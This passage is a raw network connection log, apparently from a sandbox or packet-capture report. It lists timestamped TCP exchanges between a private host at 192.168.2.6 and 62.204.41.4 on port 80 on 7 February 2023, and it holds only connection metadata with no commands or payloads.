                          Feb 7, 2023 20:04:00.598596096 CET5040680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:00.661384106 CET805040662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:00.665374994 CET805040662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:00.665559053 CET5040680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:00.786410093 CET5040680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:00.787204027 CET5040780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:00.847770929 CET805040762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:00.847867012 CET5040780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:00.848989964 CET5040780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:00.849294901 CET805040662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:00.849384069 CET5040680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:00.909442902 CET805040762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:00.911798954 CET805040762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:00.911902905 CET5040780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.034897089 CET5040780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.035790920 CET5040880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.095715046 CET805040762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.095829964 CET5040780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.096010923 CET805040862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.096102953 CET5040880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.096954107 CET5040880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.157238007 CET805040862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.162182093 CET805040862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.162300110 CET5040880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.267184973 CET5040880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.269140959 CET5040980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.327783108 CET805040862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.328444958 CET5040880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.330566883 CET805040962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.334089041 CET5040980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.334892035 CET5040980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.396377087 CET805040962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.399890900 CET805040962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.400075912 CET5040980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.517977953 CET5040980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.519270897 CET5041080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.579770088 CET805040962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.579865932 CET805041062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.579927921 CET5040980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.579993963 CET5041080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.580414057 CET5041080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.640763998 CET805041062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.644088030 CET805041062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.646951914 CET5041080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.751996040 CET5041080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.752962112 CET5041180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.812588930 CET805041062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.814290047 CET805041162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.814371109 CET5041080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.814423084 CET5041180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.821830034 CET5041180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:01.883100033 CET805041162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.885998964 CET805041162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:01.886188984 CET5041180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.001169920 CET5041180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.001872063 CET5041280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.063617945 CET805041162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.063754082 CET5041180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.064160109 CET805041262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.064419031 CET5041280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.064924955 CET5041280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.126374006 CET805041262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.131974936 CET805041262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.132539988 CET5041280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.252796888 CET5041280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.257555008 CET5041380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.314259052 CET805041262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.314450026 CET5041280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.319300890 CET805041362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.319525003 CET5041380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.323272943 CET5041380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.385001898 CET805041362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.387392998 CET805041362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.387507915 CET5041380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.533267975 CET5041380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.534147024 CET5041480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.594857931 CET805041462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.594891071 CET805041362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.595050097 CET5041480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.595108032 CET5041380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.595462084 CET5041480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.655780077 CET805041462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.658051968 CET805041462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.658273935 CET5041480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.775285006 CET5041480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.776098967 CET5041580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.835871935 CET805041462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.836095095 CET5041480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.836467028 CET805041562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.836617947 CET5041580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.837203026 CET5041580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:02.898241997 CET805041562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.900954962 CET805041562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:02.901127100 CET5041580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.021100044 CET5041580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.023051023 CET5041680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.081693888 CET805041562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.081892014 CET5041580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.084446907 CET805041662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.084656000 CET5041680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.085072994 CET5041680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.147756100 CET805041662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.150670052 CET805041662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.150768042 CET5041680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.266962051 CET5041680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.267739058 CET5041780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.327636957 CET805041762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.327744961 CET5041780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.328443050 CET805041662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.328677893 CET5041680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.329320908 CET5041780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.388925076 CET805041762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.391789913 CET805041762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.391874075 CET5041780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.502449989 CET5041780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.503437996 CET5041880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.562346935 CET805041762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.562453985 CET5041780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.564671040 CET805041862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.564778090 CET5041880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.565176010 CET5041880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.626522064 CET805041862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.629466057 CET805041862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.629581928 CET5041880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.736378908 CET5041880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.737282991 CET5041980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.797938108 CET805041862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.798103094 CET5041880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.799726963 CET805041962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.799918890 CET5041980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.800340891 CET5041980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.862807989 CET805041962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.865376949 CET805041962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:03.865505934 CET5041980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.972187996 CET5041980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:03.973011971 CET5042080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.034725904 CET805042062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.034864902 CET5042080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.034909010 CET805041962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.034990072 CET5041980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.035367012 CET5042080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.096720934 CET805042062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.100559950 CET805042062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.100657940 CET5042080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.207825899 CET5042080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.208621979 CET5042180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.268871069 CET805042162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.269061089 CET5042180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.269089937 CET805042062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.269182920 CET5042080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.274056911 CET5042180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.335969925 CET805042162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.338717937 CET805042162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.342273951 CET5042180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.459856987 CET5042180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.461585999 CET5042280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.520328045 CET805042162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.522104025 CET805042262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.522269964 CET5042180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.522404909 CET5042280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.527765036 CET5042280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.588118076 CET805042262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.591325045 CET805042262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.591427088 CET5042280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.705744028 CET5042280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.706867933 CET5042380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.767389059 CET805042262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.769534111 CET805042362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.769774914 CET5042280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.769877911 CET5042380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.774413109 CET5042380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.836025953 CET805042362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.839099884 CET805042362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:04.839373112 CET5042380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.955039024 CET5042380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:04.955816031 CET5042480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.015503883 CET805042462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.015750885 CET5042480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.016891003 CET5042480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.017550945 CET805042362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.017678022 CET5042380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.076251984 CET805042462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.080219030 CET805042462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.080486059 CET5042480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.189668894 CET5042480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.190443993 CET5042580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.249181986 CET805042462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.249654055 CET5042480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.251758099 CET805042562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.252002954 CET5042580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.253500938 CET5042580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.315032005 CET805042562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.317790985 CET805042562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.317984104 CET5042580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.439137936 CET5042580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.440088987 CET5042680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.500684977 CET805042562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.500871897 CET5042580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.501462936 CET805042662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.501641035 CET5042680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.502600908 CET5042680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.564009905 CET805042662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.567068100 CET805042662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.567215919 CET5042680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.673727036 CET5042680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.674401045 CET5042780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.735121965 CET805042762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.735238075 CET805042662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.735369921 CET5042780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.735423088 CET5042680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.737323999 CET5042780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.798038006 CET805042762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.800420046 CET805042762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.800580025 CET5042780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.909198999 CET5042780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.910008907 CET5042880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.970331907 CET805042762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.970530987 CET5042780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.971539974 CET805042862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:05.971731901 CET5042880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:05.975694895 CET5042880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.037286997 CET805042862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.039757967 CET805042862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.039947987 CET5042880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.143443108 CET5042880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.144431114 CET5042980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.204931021 CET805042962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.204961061 CET805042862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.205132961 CET5042880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.205133915 CET5042980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.205612898 CET5042980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.266041994 CET805042962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.270401001 CET805042962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.270523071 CET5042980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.429352999 CET5042980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.430236101 CET5043080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.489886045 CET805042962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.490017891 CET5042980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.492435932 CET805043062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.492594957 CET5043080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.494424105 CET5043080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.556678057 CET805043062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.559781075 CET805043062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.559906006 CET5043080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.677361965 CET5043080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.678272963 CET5043180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.739957094 CET805043062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.740046978 CET5043080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.740650892 CET805043162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.740757942 CET5043180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.742108107 CET5043180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.804414988 CET805043162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.807320118 CET805043162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.807421923 CET5043180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.924825907 CET5043180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.925558090 CET5043280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.986995935 CET805043262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.987188101 CET5043280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.987375975 CET805043162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:06.987469912 CET5043180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:06.987942934 CET5043280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.049335003 CET805043262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.053987026 CET805043262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.054104090 CET5043280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.189027071 CET5043280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.189944983 CET5043380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.252116919 CET805043262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.252260923 CET5043280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.252373934 CET805043362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.252507925 CET5043380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.254487991 CET5043380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.317082882 CET805043362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.319380045 CET805043362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.319490910 CET5043380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.424571037 CET5043380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.425698996 CET5043480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.486833096 CET805043362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.487031937 CET805043462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.487149954 CET5043380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.487216949 CET5043480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.488023043 CET5043480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.549278975 CET805043462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.553051949 CET805043462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.553527117 CET5043480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.659111023 CET5043480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.660028934 CET5043580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.719429970 CET805043562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.720496893 CET805043462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.720546961 CET5043580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.720587015 CET5043480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.721879005 CET5043580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.781335115 CET805043562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.789803028 CET805043562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.789994001 CET5043580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.892664909 CET5043580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.893661022 CET5043680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.952086926 CET805043562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.954597950 CET5043580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.956959009 CET805043662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:07.957220078 CET5043680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:07.968971014 CET5043680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.031441927 CET805043662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.034284115 CET805043662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.034435034 CET5043680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.143968105 CET5043680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.144767046 CET5043780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.204371929 CET805043762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.204687119 CET5043780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.206569910 CET5043780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.206773043 CET805043662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.212713003 CET5043680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.266233921 CET805043762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.270641088 CET805043762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.274647951 CET5043780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.383766890 CET5043780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.384484053 CET5043880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.443331003 CET805043762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.443540096 CET5043780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.447052956 CET805043862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.447276115 CET5043880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.447685957 CET5043880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.509490967 CET805043862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.512579918 CET805043862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.512815952 CET5043880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.627010107 CET5043880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.627768040 CET5043980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.688894033 CET805043862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.689008951 CET5043880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.689369917 CET805043962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.689459085 CET5043980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.690442085 CET5043980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.752062082 CET805043962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.754954100 CET805043962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.755094051 CET5043980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.863209009 CET5043980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.867507935 CET5044080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.925065994 CET805043962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.925241947 CET5043980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.928869009 CET805044062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.929111004 CET5044080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.934140921 CET5044080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:08.995600939 CET805044062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.998528004 CET805044062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:08.998744011 CET5044080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.112046003 CET5044080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.113204956 CET5044180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.173531055 CET805044162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.173660040 CET5044180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.174122095 CET5044180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.174432993 CET805044062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.174501896 CET5044080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.233417034 CET805044162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.238481045 CET805044162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.238570929 CET5044180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.347974062 CET5044180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.349065065 CET5044280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.407712936 CET805044162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.407839060 CET5044180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.408885002 CET805044262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.409037113 CET5044280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.409560919 CET5044280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.469218969 CET805044262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.472440004 CET805044262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.472759962 CET5044280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.581382036 CET5044280192.168.2.662.204.41.4
